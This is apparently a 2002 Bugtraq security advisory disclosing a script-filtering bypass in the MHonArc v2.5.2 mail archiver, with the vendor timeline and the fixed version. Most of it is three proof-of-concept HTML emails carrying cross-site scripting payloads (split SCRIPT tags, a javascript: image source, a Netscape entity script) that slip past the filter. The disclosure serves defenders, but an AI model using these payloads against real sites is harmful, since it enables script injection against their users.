MHonArc v2.5.2 Script Filtering Bypass Vulnerability

From:	 "TAKAGI, Hiromitsu" <takagi.hiromitsu@aist.go.jp>
To:	 bugtraq@securityfocus.com
Subject: MHonArc v2.5.2 Script Filtering Bypass Vulnerability
Date:	 Fri, 19 Apr 2002 06:53:54 +0900

MHonArc v2.5.2 Script Filtering Bypass Vulnerability
====================================================

Affected:
---------
  MHonArc v2.5.2
  http://www.mhonarc.org/

Fixed:
------
  MHonArc v2.5.3
  http://www.mhonarc.org/MHonArc/CHANGES

Problem:
--------
  MHonArc has a feature which filters out scripting tags from incoming
  HTML mails and it is enabled on default.  However, some variations
  of scripting tags will not be filtered.

Exploit 1:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
  </HTML>
----------

Exploit 2:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <IMG SRC=javascript:alert(document.domain)>
  </HTML>
----------

Exploit 3:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <B foo=&{alert(document.domain)};>
  Vulnerable only if Netscape 4.x is used to browse.</B>
  </HTML>
----------

Vendor Status:
--------------
  The author was contacted on December 16, 2001.
  The fixed version was released on April 18, 2002.


Best regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://staff.aist.go.jp/takagi.hiromitsu/